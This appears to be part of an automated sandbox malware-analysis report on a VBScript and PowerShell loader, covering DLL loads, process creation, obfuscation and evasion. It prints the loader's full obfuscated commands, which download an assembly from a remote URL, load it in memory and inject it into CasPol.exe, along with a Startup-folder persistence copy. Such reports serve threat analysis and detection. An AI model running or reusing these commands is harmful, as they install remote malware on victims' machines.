                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: urlmon.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: iertutil.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: srvcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: netutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: propsys.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: avicap32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: msvfw32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winmm.dll
                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.1704495175.000001691101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs");IFileSystem3.CopyFile("C:\Windows\system32\wm.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJys", "0", "false")
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF886C44FF3 push eax; retf 5_2_00007FF886C44FE9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF886C402FD push ds; iretd 5_2_00007FF886C403E2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF886C40CD3 push ds; iretd 5_2_00007FF886C40CDA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF887A24223 push cs; ret 9_2_00007FF887A24282
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: 1570000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: 3530000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: 1570000 memory reserve | memory write watch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF887A286A9 sldt word ptr fs:[eax] 9_2_00007FF887A286A9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1497
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3800
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1436
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 660
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3468
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6381
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 3879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 5956
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048 | Thread sleep count: 1497 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048 | Thread sleep count: 3800 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 | Thread sleep count: 3468 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 | Thread sleep count: 6381 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572 | Thread sleep time: -16602069666338586s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5088 | Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6248 | Thread sleep count: 3879 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6248 | Thread sleep count: 5956 > 30
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File Volume queried: C:\ FullSizeInformation
                Source: powershell.exe, 00000009.00000002.1735316360.000001697BAB4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
                Source: CasPol.exe, 0000000A.00000002.2644477177.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40A000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40C000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F5F008
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
